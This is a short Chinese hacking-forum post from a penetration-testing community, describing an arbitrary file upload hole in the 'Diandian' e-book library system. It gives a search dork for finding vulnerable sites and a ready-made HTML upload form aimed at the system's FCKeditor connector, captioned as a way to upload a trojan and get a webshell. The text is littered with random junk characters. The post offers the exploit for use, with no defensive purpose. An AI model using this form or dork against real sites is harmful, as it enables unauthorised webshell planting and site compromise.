中国网络渗透测试联盟

标题: 点点书库图书馆系统文件上传漏洞 [打印本页]
作者: admin    时间: 2012-9-10 21:20
标题: 点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞
  h' a" m# u2 X% I 作者:冰锋刺客4 B' S% w% [( ^; H2 s
厂商:点击书(dianjishu.com)/ g( v& T) w4 e# m, Y# }
日期:2012-6-21
3 S. v2 t% w8 a; l+ }5 L9 p9 N  e 1 S- b% E* W5 T; _+ u6 j$ ^: }0 S
I 概述9 ?9 |  X6 c/ V; ]) \, G
   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell% k$ u8 P# B" W% i. q4 S
II 简介9 l0 Q! j! n4 X( u: D9 s
   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
; ~6 B9 }' n5 t) U* {+ d 补充一个漏洞1 _8 T* j: M5 C* Z% b) ?
<form id="frmUpload" enctype="multipart/form-data"& j- P0 s# Q1 K8 i
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
3 v3 Q' S! H/ U0 O8 ~9 u. G <input id="btnUpload" type="submit" value="操翻他">; h0 {2 b/ w8 r) F4 ^; @8 e* j1 s
</form>
" |1 R+ ?- q8 x% S4 Z& h( H8 j 你们懂的
" ~3 m9 C) |/ I8 | 那傻逼提供还需要改包.; o- U6 \/ `& N. U
自己看了下源代码发现fckeditor
! o& g# n3 a, F! }) R- _$ ^ 直接秒杀
' i# p6 |+ p; {. W2 M/ E



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2